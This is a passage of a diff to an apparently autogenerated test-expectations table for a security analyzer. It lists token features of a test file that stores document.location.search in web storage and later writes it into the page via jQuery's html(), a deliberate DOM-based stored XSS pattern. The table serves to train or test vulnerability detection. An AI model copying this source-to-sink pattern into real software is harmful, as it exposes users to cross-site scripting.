enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:63 | exceptional return of session ... search) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:63 | exceptional return of session ... search) | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:63 | session ... search) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:63 | session ... search) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:63 | session ... search) | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:63 | session ... search) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:5:2:63 | session ... search) | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:20:2:26 | setItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:20:2:26 | setItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:20:2:26 | setItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:20:2:26 | setItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:20:2:26 | setItem | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:2:28:2:36 | 'session' | CalleeFlexibleAccessPath | sessionStorage.setItem | | autogenerated/Xss/DomBasedXss/stored-xss.js:2:28:2:36 | 'session' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:2:28:2:36 | 'session' | contextFunctionInterfaces | | @@ -15202,6 +108857,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:2:28:2:36 | 'session' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:2:28:2:36 | 'session' | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:2:28:2:36 | 'session' | receiverName | sessionStorage | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:39:2:46 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:39:2:46 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:39:2:46 | document | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:39:2:46 | document | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:39:2:46 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:39:2:55 | document.location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:39:2:55 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:39:2:55 | document.location | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:39:2:55 | document.location | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:39:2:55 | document.location | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:2:39:2:62 | documen ... .search | CalleeFlexibleAccessPath | sessionStorage.setItem | | autogenerated/Xss/DomBasedXss/stored-xss.js:2:39:2:62 | documen ... .search | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/stored-xss.js:2:39:2:62 | documen ... .search | contextFunctionInterfaces | | @@ -15210,6 +108875,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:2:39:2:62 | documen ... .search | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:2:39:2:62 | documen ... .search | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:2:39:2:62 | documen ... .search | receiverName | sessionStorage | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:48:2:55 | location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:48:2:55 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:48:2:55 | location | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:48:2:55 | location | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:48:2:55 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:57:2:62 | search | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:57:2:62 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:57:2:62 | search | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:57:2:62 | search | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:2:57:2:62 | search | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:16 | localStorage | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:16 | localStorage | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:16 | localStorage | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:16 | localStorage | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:16 | localStorage | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:24 | localStorage.setItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:24 | localStorage.setItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:24 | localStorage.setItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:24 | localStorage.setItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:24 | localStorage.setItem | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:59 | exceptional return of localSt ... search) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:59 | exceptional return of localSt ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:59 | exceptional return of localSt ... search) | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:59 | exceptional return of localSt ... search) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:59 | exceptional return of localSt ... search) | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:59 | localSt ... search) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:59 | localSt ... search) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:59 | localSt ... search) | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:59 | localSt ... search) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:5:3:59 | localSt ... search) | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:18:3:24 | setItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:18:3:24 | setItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:18:3:24 | setItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:18:3:24 | setItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:18:3:24 | setItem | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:3:26:3:32 | 'local' | CalleeFlexibleAccessPath | localStorage.setItem | | autogenerated/Xss/DomBasedXss/stored-xss.js:3:26:3:32 | 'local' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:3:26:3:32 | 'local' | contextFunctionInterfaces | | @@ -15218,6 +108918,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:3:26:3:32 | 'local' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:3:26:3:32 | 'local' | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:3:26:3:32 | 'local' | receiverName | localStorage | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:35:3:42 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:35:3:42 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:35:3:42 | document | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:35:3:42 | document | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:35:3:42 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:35:3:51 | document.location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:35:3:51 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:35:3:51 | document.location | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:35:3:51 | document.location | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:35:3:51 | document.location | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:3:35:3:58 | documen ... .search | CalleeFlexibleAccessPath | localStorage.setItem | | autogenerated/Xss/DomBasedXss/stored-xss.js:3:35:3:58 | documen ... .search | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/stored-xss.js:3:35:3:58 | documen ... .search | contextFunctionInterfaces | | @@ -15226,6 +108936,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:3:35:3:58 | documen ... .search | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:3:35:3:58 | documen ... .search | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:3:35:3:58 | documen ... .search | receiverName | localStorage | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:44:3:51 | location | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:44:3:51 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:44:3:51 | location | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:44:3:51 | location | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:44:3:51 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:53:3:58 | search | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:53:3:58 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:53:3:58 | search | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:53:3:58 | search | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:3:53:3:58 | search | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:5 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:5 | $ | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:5 | $ | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:5 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:13 | $('myId') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:13 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:13 | $('myId') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:13 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:13 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:13 | exceptional return of $('myId') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:13 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:13 | exceptional return of $('myId') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:13 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:13 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:18 | $('myId').html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:18 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:18 | $('myId').html | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:18 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:18 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:53 | $('myId ... sion')) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:53 | $('myId ... sion')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:53 | $('myId ... sion')) | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:53 | $('myId ... sion')) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:53 | $('myId ... sion')) | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:53 | exceptional return of $('myId ... sion')) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:53 | exceptional return of $('myId ... sion')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:53 | exceptional return of $('myId ... sion')) | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:53 | exceptional return of $('myId ... sion')) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:5:5:53 | exceptional return of $('myId ... sion')) | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:5:7:5:12 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/stored-xss.js:5:7:5:12 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:5:7:5:12 | 'myId' | contextFunctionInterfaces | | @@ -15233,6 +108983,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:5:7:5:12 | 'myId' | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | | autogenerated/Xss/DomBasedXss/stored-xss.js:5:7:5:12 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:5:7:5:12 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:15:5:18 | html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:15:5:18 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:15:5:18 | html | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:15:5:18 | html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:15:5:18 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:33 | sessionStorage | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:33 | sessionStorage | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:33 | sessionStorage | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:33 | sessionStorage | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:33 | sessionStorage | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:41 | session ... getItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:41 | session ... getItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:41 | session ... getItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:41 | session ... getItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:41 | session ... getItem | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:52 | exceptional return of session ... ssion') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:52 | exceptional return of session ... ssion') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:52 | exceptional return of session ... ssion') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:52 | exceptional return of session ... ssion') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:52 | exceptional return of session ... ssion') | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:52 | session ... ssion') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:52 | session ... ssion') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:52 | session ... ssion') | contextFunctionInterfaces | | @@ -15240,6 +109010,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:52 | session ... ssion') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | | autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:52 | session ... ssion') | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:5:20:5:52 | session ... ssion') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:35:5:41 | getItem | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:35:5:41 | getItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:35:5:41 | getItem | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:35:5:41 | getItem | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:5:35:5:41 | getItem | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:5:43:5:51 | 'session' | CalleeFlexibleAccessPath | sessionStorage.getItem | | autogenerated/Xss/DomBasedXss/stored-xss.js:5:43:5:51 | 'session' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:5:43:5:51 | 'session' | contextFunctionInterfaces | | @@ -15248,6 +109023,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/stored-xss.js:5:43:5:51 | 'session' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/stored-xss.js:5:43:5:51 | 'session' | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:5:43:5:51 | 'session' | receiverName | sessionStorage | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:5 | $ | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:5 | $ | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:5 | $ | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:5 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:13 | $('myId') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:13 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:13 | $('myId') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:13 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:13 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:13 | exceptional return of $('myId') | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:13 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:13 | exceptional return of $('myId') | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:13 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:13 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:18 | $('myId').html | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:18 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:18 | $('myId').html | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:18 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:18 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:51 | $('myId ... sion')) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:51 | $('myId ... sion')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:51 | $('myId ... sion')) | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:51 | $('myId ... sion')) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:51 | $('myId ... sion')) | fileImports | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:51 | exceptional return of $('myId ... sion')) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:51 | exceptional return of $('myId ... sion')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:51 | exceptional return of $('myId ... sion')) | enclosingFunctionBody | sessionStorage setItem session document location search localStorage setItem local document location search $ myId html sessionStorage getItem session $ myId html localStorage getItem session $ myId html sessionStorage getItem local $ myId html localStorage getItem local href localStorage getItem local $ myId html something | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:51 | exceptional return of $('myId ... sion')) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/stored-xss.js:6:5:6:51 | exceptional return of $('myId ... sion')) | fileImports | | | autogenerated/Xss/DomBasedXss/stored-xss.js:6:7:6:12 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/stored-xss.js:6:7:6:12 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/stored-xss.js:6:7:6:12 | 'myId' | contextFunctionInterfaces 